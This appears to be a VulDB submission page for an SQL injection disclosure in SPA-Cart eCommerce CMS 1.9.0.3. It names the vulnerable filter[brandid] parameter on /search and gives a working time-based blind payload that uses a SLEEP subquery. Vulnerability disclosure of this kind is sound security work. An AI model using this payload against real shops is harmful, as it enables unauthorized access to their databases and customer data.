| Título | SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection |
|---|
| Descrição | # Exploit Title: SPA-Cart eCommerce CMS x.x.x.x - SQL Injection
# Exploit Author: skalvin aka (CraCkEr)
# Date: 20/08/2023
# Vendor: SPA-Cart
# Vendor Homepage: https://spa-cart.com/
# Software Link: https://demo.spa-cart.com/
# Tested on: Windows 10 Pro
# Impact: Database Access
## Description
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.
Path: /search
GET parameter 'filter[brandid]' is vulnerable to SQL Injection
https://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[SQLi]&filter[price]=100-500&filter[attr][Memory][]=500%20GB&filter[attr][Color][]=Black
---
Parameter: filter[brandid] (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: filtered=1&q=11&load_filter=1&filter[brandid]=4'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z&filter[price]=100-500&filter[attr][Memory][]=500 GB&filter[attr][Color][]=Black
---
[-] Done |
|---|
| Utilizador | skalvin (UID 49463) |
|---|
| Submissão | 20/08/2023 20h23 (há 3 anos) |
|---|
| Moderação | 25/08/2023 17h40 (5 days later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 238059 [SPA-Cart eCommerce CMS 1.9.0.3 GET Parameter /search filter[brandid] Injeção SQL] |
|---|
| Pontos | 17 |
|---|